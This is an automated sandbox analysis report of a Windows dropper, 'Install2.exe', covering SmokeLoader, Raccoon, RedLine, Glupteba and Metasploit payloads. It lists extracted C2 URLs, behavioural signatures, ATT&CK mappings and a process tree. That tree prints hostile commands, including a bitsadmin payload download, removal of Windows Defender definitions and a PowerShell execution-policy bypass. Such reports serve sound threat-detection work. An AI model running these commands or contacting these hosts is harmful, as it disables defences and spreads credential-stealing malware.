Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    206s
  • max time network
    224s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    26-04-2021 18:53

Errors

Reason
Machine shutdown

General

  • Target

    Install2.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

16992cd33145ccbb6feeacb4e84400a56448fa14

Attributes
  • url4cnc

    https://telete.in/baudemars

rc4.plain
rc4.plain

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 32 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 1 IoCs
  • Drops file in System32 directory 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:864
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:4360
    • C:\Users\Admin\AppData\Local\Temp\Install2.exe
      "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:540
      • C:\Users\Admin\AppData\Local\Temp\is-C1ABR.tmp\Install2.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-C1ABR.tmp\Install2.tmp" /SL5="$4011A,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Users\Admin\AppData\Local\Temp\is-3J2PP.tmp\Ultra.exe
          "C:\Users\Admin\AppData\Local\Temp\is-3J2PP.tmp\Ultra.exe" /S /UID=burnerch1
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:640
          • C:\Program Files\Windows Defender\OXSMCPFEYA\ultramediaburner.exe
            "C:\Program Files\Windows Defender\OXSMCPFEYA\ultramediaburner.exe" /VERYSILENT
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1496
            • C:\Users\Admin\AppData\Local\Temp\is-2DMR3.tmp\ultramediaburner.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-2DMR3.tmp\ultramediaburner.tmp" /SL5="$6012C,281924,62464,C:\Program Files\Windows Defender\OXSMCPFEYA\ultramediaburner.exe" /VERYSILENT
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:1672
              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                6⤵
                • Executes dropped EXE
                PID:652
          • C:\Users\Admin\AppData\Local\Temp\c4-9a116-c70-efc83-9d52107f1471b\Raeqiraluki.exe
            "C:\Users\Admin\AppData\Local\Temp\c4-9a116-c70-efc83-9d52107f1471b\Raeqiraluki.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1096
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2040
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2040 CREDAT:275457 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:572
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2040 CREDAT:340994 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:4692
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 1408
                  7⤵
                  • Program crash
                  • Suspicious behavior: GetForegroundWindowSpam
                  PID:8348
          • C:\Users\Admin\AppData\Local\Temp\b7-dcefd-069-0c693-1281e3c778d36\Pobolisyqae.exe
            "C:\Users\Admin\AppData\Local\Temp\b7-dcefd-069-0c693-1281e3c778d36\Pobolisyqae.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1604
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bx2lcj3m.ut0\instEU.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:8896
              • C:\Users\Admin\AppData\Local\Temp\bx2lcj3m.ut0\instEU.exe
                C:\Users\Admin\AppData\Local\Temp\bx2lcj3m.ut0\instEU.exe
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:9092
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jdfjjdm0.mvp\google-game.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3560
              • C:\Users\Admin\AppData\Local\Temp\jdfjjdm0.mvp\google-game.exe
                C:\Users\Admin\AppData\Local\Temp\jdfjjdm0.mvp\google-game.exe
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3616
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  7⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4220
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dqbe1amy.4sx\md1_1eaf.exe & exit
              5⤵
                PID:4848
                • C:\Users\Admin\AppData\Local\Temp\dqbe1amy.4sx\md1_1eaf.exe
                  C:\Users\Admin\AppData\Local\Temp\dqbe1amy.4sx\md1_1eaf.exe
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:4908
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b4cjopvi.wru\askinstall39.exe & exit
                5⤵
                  PID:5076
                  • C:\Users\Admin\AppData\Local\Temp\b4cjopvi.wru\askinstall39.exe
                    C:\Users\Admin\AppData\Local\Temp\b4cjopvi.wru\askinstall39.exe
                    6⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5124
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      7⤵
                        PID:5388
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          8⤵
                          • Kills process with taskkill
                          PID:5444
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cexmqct2.dph\SunLabsPlayer.exe /S & exit
                    5⤵
                      PID:5856
                      • C:\Users\Admin\AppData\Local\Temp\cexmqct2.dph\SunLabsPlayer.exe
                        C:\Users\Admin\AppData\Local\Temp\cexmqct2.dph\SunLabsPlayer.exe /S
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in Program Files directory
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:5964
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnC969.tmp\tempfile.ps1"
                          7⤵
                            PID:936
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnC969.tmp\tempfile.ps1"
                            7⤵
                              PID:9204
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnC969.tmp\tempfile.ps1"
                              7⤵
                                PID:2156
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnC969.tmp\tempfile.ps1"
                                7⤵
                                • Drops file in Program Files directory
                                PID:2820
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnC969.tmp\tempfile.ps1"
                                7⤵
                                  PID:5684
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnC969.tmp\tempfile.ps1"
                                  7⤵
                                  • Drops file in Program Files directory
                                  PID:7788
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnC969.tmp\tempfile.ps1"
                                  7⤵
                                  • Checks for any installed AV software in registry
                                  PID:8560
                                • C:\Windows\SysWOW64\bitsadmin.exe
                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                  7⤵
                                  • Download via BitsAdmin
                                  PID:2388
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a53vjoxl.3dr\inst.exe & exit
                              5⤵
                                PID:6048
                                • C:\Users\Admin\AppData\Local\Temp\a53vjoxl.3dr\inst.exe
                                  C:\Users\Admin\AppData\Local\Temp\a53vjoxl.3dr\inst.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:6120
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qk3co2kr.phj\toolspab1.exe & exit
                                5⤵
                                  PID:6764
                                  • C:\Users\Admin\AppData\Local\Temp\qk3co2kr.phj\toolspab1.exe
                                    C:\Users\Admin\AppData\Local\Temp\qk3co2kr.phj\toolspab1.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:6800
                                    • C:\Users\Admin\AppData\Local\Temp\qk3co2kr.phj\toolspab1.exe
                                      C:\Users\Admin\AppData\Local\Temp\qk3co2kr.phj\toolspab1.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: MapViewOfSection
                                      PID:2376
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xfq5zjwy.lhk\app.exe /8-2222 & exit
                                  5⤵
                                    PID:6964
                                    • C:\Users\Admin\AppData\Local\Temp\xfq5zjwy.lhk\app.exe
                                      C:\Users\Admin\AppData\Local\Temp\xfq5zjwy.lhk\app.exe /8-2222
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      PID:7108
                                      • C:\Users\Admin\AppData\Local\Temp\xfq5zjwy.lhk\app.exe
                                        "C:\Users\Admin\AppData\Local\Temp\xfq5zjwy.lhk\app.exe" /8-2222
                                        7⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        PID:7420
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ngwkiurz.3zc\c7ae36fa.exe & exit
                                    5⤵
                                      PID:7072
                                      • C:\Users\Admin\AppData\Local\Temp\ngwkiurz.3zc\c7ae36fa.exe
                                        C:\Users\Admin\AppData\Local\Temp\ngwkiurz.3zc\c7ae36fa.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        • Suspicious behavior: MapViewOfSection
                                        PID:7140
                            • C:\Users\Admin\AppData\Local\Temp\F373.exe
                              C:\Users\Admin\AppData\Local\Temp\F373.exe
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:6032
                            • C:\Users\Admin\AppData\Local\Temp\F5C5.exe
                              C:\Users\Admin\AppData\Local\Temp\F5C5.exe
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:6136
                            • C:\Users\Admin\AppData\Local\Temp\FC8A.exe
                              C:\Users\Admin\AppData\Local\Temp\FC8A.exe
                              1⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              PID:5276
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Users\Admin\AppData\Local\241d4ecf-33e6-4ab2-a725-b27fd2d896ce" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                2⤵
                                • Modifies file permissions
                                PID:6608
                              • C:\Users\Admin\AppData\Local\Temp\FC8A.exe
                                "C:\Users\Admin\AppData\Local\Temp\FC8A.exe" --Admin IsNotAutoStart IsNotTask
                                2⤵
                                  PID:7276
                                  • C:\Users\Admin\AppData\Local\bdc4a13d-6f9a-4ad7-94e2-f327903250e2\updatewin1.exe
                                    "C:\Users\Admin\AppData\Local\bdc4a13d-6f9a-4ad7-94e2-f327903250e2\updatewin1.exe"
                                    3⤵
                                      PID:7580
                                      • C:\Users\Admin\AppData\Local\bdc4a13d-6f9a-4ad7-94e2-f327903250e2\updatewin1.exe
                                        "C:\Users\Admin\AppData\Local\bdc4a13d-6f9a-4ad7-94e2-f327903250e2\updatewin1.exe" --Admin
                                        4⤵
                                          PID:7108
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
                                            5⤵
                                              PID:7684
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""script.ps1""' -Verb RunAs}"
                                              5⤵
                                                PID:7072
                                              • C:\Program Files\Windows Defender\mpcmdrun.exe
                                                "C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
                                                5⤵
                                                • Deletes Windows Defender Definitions
                                                PID:7988
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
                                                5⤵
                                                  PID:7996
                                            • C:\Users\Admin\AppData\Local\bdc4a13d-6f9a-4ad7-94e2-f327903250e2\updatewin2.exe
                                              "C:\Users\Admin\AppData\Local\bdc4a13d-6f9a-4ad7-94e2-f327903250e2\updatewin2.exe"
                                              3⤵
                                                PID:7100
                                          • C:\Users\Admin\AppData\Local\Temp\744.exe
                                            C:\Users\Admin\AppData\Local\Temp\744.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:6408
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\744.exe"
                                              2⤵
                                                PID:7716
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /T 10 /NOBREAK
                                                  3⤵
                                                  • Delays execution with timeout.exe
                                                  PID:7956
                                            • C:\Users\Admin\AppData\Local\Temp\1144.exe
                                              C:\Users\Admin\AppData\Local\Temp\1144.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:6576
                                            • C:\Users\Admin\AppData\Local\Temp\152B.exe
                                              C:\Users\Admin\AppData\Local\Temp\152B.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:1716
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                2⤵
                                                  PID:7460
                                              • C:\Users\Admin\AppData\Local\Temp\3F76.exe
                                                C:\Users\Admin\AppData\Local\Temp\3F76.exe
                                                1⤵
                                                  PID:7484
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htkigbcz\
                                                    2⤵
                                                      PID:7616
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nnozuvtb.exe" C:\Windows\SysWOW64\htkigbcz\
                                                      2⤵
                                                        PID:7732
                                                      • C:\Users\Admin\ugfteowq.exe
                                                        "C:\Users\Admin\ugfteowq.exe" /d"C:\Users\Admin\AppData\Local\Temp\3F76.exe" /e5503011200000005
                                                        2⤵
                                                          PID:8032
                                                      • C:\Windows\SysWOW64\explorer.exe
                                                        C:\Windows\SysWOW64\explorer.exe
                                                        1⤵
                                                          PID:7964
                                                        • C:\Windows\explorer.exe
                                                          C:\Windows\explorer.exe
                                                          1⤵
                                                            PID:7760
                                                          • C:\Windows\SysWOW64\explorer.exe
                                                            C:\Windows\SysWOW64\explorer.exe
                                                            1⤵
                                                              PID:7948

                                                            Network

                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                            Execution

                                                            Command-Line Interface

                                                            1
                                                            T1059

                                                            Persistence

                                                            Registry Run Keys / Startup Folder

                                                            1
                                                            T1060

                                                            BITS Jobs

                                                            1
                                                            T1197

                                                            Defense Evasion

                                                            Impair Defenses

                                                            1
                                                            T1562

                                                            File Permissions Modification

                                                            1
                                                            T1222

                                                            Modify Registry

                                                            3
                                                            T1112

                                                            BITS Jobs

                                                            1
                                                            T1197

                                                            Install Root Certificate

                                                            1
                                                            T1130

                                                            Credential Access

                                                            Credentials in Files

                                                            1
                                                            T1081

                                                            Discovery

                                                            Software Discovery

                                                            1
                                                            T1518

                                                            Security Software Discovery

                                                            1
                                                            T1063

                                                            Query Registry

                                                            3
                                                            T1012

                                                            System Information Discovery

                                                            3
                                                            T1082

                                                            Peripheral Device Discovery

                                                            1
                                                            T1120

                                                            Collection

                                                            Data from Local System

                                                            1
                                                            T1005

                                                            Command and Control

                                                            Web Service

                                                            1
                                                            T1102

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                              MD5

                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                              SHA1

                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                              SHA256

                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                              SHA512

                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                              MD5

                                                              7124be0b78b9f4976a9f78aaeaed893a

                                                              SHA1

                                                              804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                              SHA256

                                                              bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                              SHA512

                                                              49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                            • C:\Program Files\Windows Defender\OXSMCPFEYA\ultramediaburner.exe
                                                              MD5

                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                              SHA1

                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                              SHA256

                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                              SHA512

                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                            • C:\Program Files\Windows Defender\OXSMCPFEYA\ultramediaburner.exe
                                                              MD5

                                                              6103ca066cd5345ec41feaf1a0fdadaf

                                                              SHA1

                                                              938acc555933ee4887629048be4b11df76bb8de8

                                                              SHA256

                                                              b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                              SHA512

                                                              a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                            • C:\Program Files\install.dat
                                                              MD5

                                                              bef5c483c6eba257020201190666e28d

                                                              SHA1

                                                              e7f5cda41f731eea23bc45c0a6c06ad91f1d7df8

                                                              SHA256

                                                              d42b23175385ccc042ffebd37cc0f25847c790fb6f98bad0cd024f70f85b3fce

                                                              SHA512

                                                              302bca91e431e388f7bcff837ab6b7be23a9a38026410589e4ae3c86be057039117897429b5664eccee8a6871904f8e44629acf7d837cece8c701fb6915fdf90

                                                            • C:\Program Files\install.dll
                                                              MD5

                                                              c6a2e4e23319dec9d56f8029ef834e83

                                                              SHA1

                                                              299e80473cbe56b596a2d4d38aea0aab46826167

                                                              SHA256

                                                              6ae4bd10f8bc7f3e5856c7f3571d165787f48d23f95ccfa823a5dab74f7fd554

                                                              SHA512

                                                              2a30529c2254ff481ab099032829d1b533d8bb6fca6a766d04e3febd6dc87ba34852eb7354ffc8d0ed7f584b5bff587e2b549c4f4c9150e98a2ff6a0f751438a

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                              MD5

                                                              9d339d8eb93e77d05530701518bed368

                                                              SHA1

                                                              80e448ea7ee0641864c114eba5a3b386012b42c9

                                                              SHA256

                                                              40011a09552576ee2de467add160049f5d660f2c0a001f58c60fba7be7acb6de

                                                              SHA512

                                                              0f5306bae56125be8390f1e9a2620e41c605ca6c9f5b605f57bdb7d35a54a9ebd7aae2269c3cc5bcab1e7603869ad7af738ae5650fab6c4905b1ad513cbb2567

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                              MD5

                                                              59b0f865bd2cf1d2622089628c472304

                                                              SHA1

                                                              c81cbb1b7eea10e0a40f96e2e97acafa1e57145a

                                                              SHA256

                                                              771695fa71a5bd56a4558913b840bae5d2eca622148107508bfe255e43799439

                                                              SHA512

                                                              759c74e4c1ac40d89ee4d32012465f87333af4c8d9d3cbf22a0428cfdea30d1a1b73bcd940944149a45e06cb12c0483575e14dba5445b2605c9af90894eddaae

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                              MD5

                                                              f7a0936661e806bc3d7be9555071a2d6

                                                              SHA1

                                                              12df2ac9d89282806c40b3b244950317a3c2840e

                                                              SHA256

                                                              ee21f51a1586dfa9eaf7cc4a9297c90a4f562d36be080b148271ab888a0845d9

                                                              SHA512

                                                              be36b8957e08638d8bc29b4495775f2c7318774a8d16e118596ee382dcb68762781da10873e9f5ab57e56899456cee8703c9882c7449b698c231844a9363900e

                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                              MD5

                                                              bfe68172931e234bbf8ddd44beb12ecc

                                                              SHA1

                                                              d35cc2ce55608f57c3f8945ac417694a74eaf9bd

                                                              SHA256

                                                              72e1a688d17cc368497c114bb13989524eb79b4e5f7b7d260968d36330e7160e

                                                              SHA512

                                                              240d409a1e24485b50c8d36b7c3a565e5cdaf4cc4bb4383160f322db5f3f698b5c9fa9076b5a86bc9c0c92846d8b243e6a1facefe69956f81dc1f62dbb370bcb

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
                                                              MD5

                                                              02ff38ac870de39782aeee04d7b48231

                                                              SHA1

                                                              0390d39fa216c9b0ecdb38238304e518fb2b5095

                                                              SHA256

